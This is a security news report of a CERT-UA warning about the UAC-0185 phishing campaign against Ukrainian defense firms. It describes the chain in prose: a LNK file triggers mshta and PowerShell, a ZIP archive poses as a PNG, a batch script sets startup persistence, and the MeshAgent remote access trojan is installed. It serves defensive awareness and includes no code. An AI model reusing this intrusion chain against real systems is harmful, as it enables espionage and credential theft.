UAC-0185 Hackers Weaponize LNK Files for Dangerous Payloads

CERT-UA, the Ukrainian government’s cybersecurity arm, issued a warning about a targeted phishing campaign (UAC-0185) aimed at Ukrainian defense organizations and enterprises within the defense industry (OPK). 

By sending phishing emails that appear to have originated from the Ukrainian Union of Employers (UESP), the attack makes use of social engineering in order to carry out its objectives. 

These emails, disguised with the subject line “for your attention_changes_02-1-437 dated December 4, 2024,” entice recipients into attending a conference focused on aligning Ukrainian defense products with NATO technical standards. 

The malicious payload resides within a hyperlink labeled “Attachment contains important information for your participation” embedded within the email. Clicking this link initiates the download of a disguised shortcut file (“.lnk”) named “letter_02-1-437.lnk” onto the victim’s machine.

Opening the LNK file triggers the execution of the legitimate mshta.exe utility, which in turn downloads and executes a file named “start.hta,” which acts as a delivery mechanism, deploying a malicious JavaScript code that initiates two PowerShell commands. 

Following the execution of the first command, a decoy file that has been crafted to look like a UESP letter is retrieved and opened, further obscuring the attacker’s intentions. 

The second, more critical, command downloads a file named “Front.png,” as this seemingly innocuous image file is, in fact, a ZIP archive containing three malicious components: “Main.bat,” “Registry.hta,” and “update.exe.” 

The archive silently extracts its contents into a predetermined directory, “%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\” and subsequently executes the “Main.bat” batch script, which serves several purposes. 

It strategically moves “Registry.hta” into the system’s startup folder, ensuring its persistence across system reboots and executes “Registry.hta” by eliminating certain downloaded files to minimize forensic artifacts, then “Registry.hta” launches “update.exe,” which is identified as the MESHAGENT remote access trojan (RAT).

CERT-UA’s investigation uncovered additional files and infrastructure linked to cyberattacks stretching back to early 2023. The UAC-0185 group, also known by the alias UNC4221, has exhibited activity since at least 2022. 

Their primary objective appears to be credential theft, specifically targeting credentials for popular messaging applications like Signal, Telegram, and WhatsApp. 

They have also demonstrated the capability to conduct limited attacks aimed at establishing unauthorized remote access to compromised computer systems, potentially for further malicious activity.  

Also Read: